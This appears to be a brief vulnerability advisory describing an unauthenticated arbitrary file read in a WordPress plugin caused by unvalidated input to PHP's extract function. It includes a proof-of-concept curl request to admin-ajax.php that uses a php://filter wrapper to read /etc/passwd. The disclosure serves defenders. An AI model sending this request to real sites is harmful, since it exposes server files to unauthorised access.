The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system.
curl 'https://example.com/wp-admin/admin-ajax.php' \ -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=/etc/passwd'
2023-01-25 (about 4 months ago)
2023-01-23 (about 4 months ago)
2023-01-23 (about 4 months ago)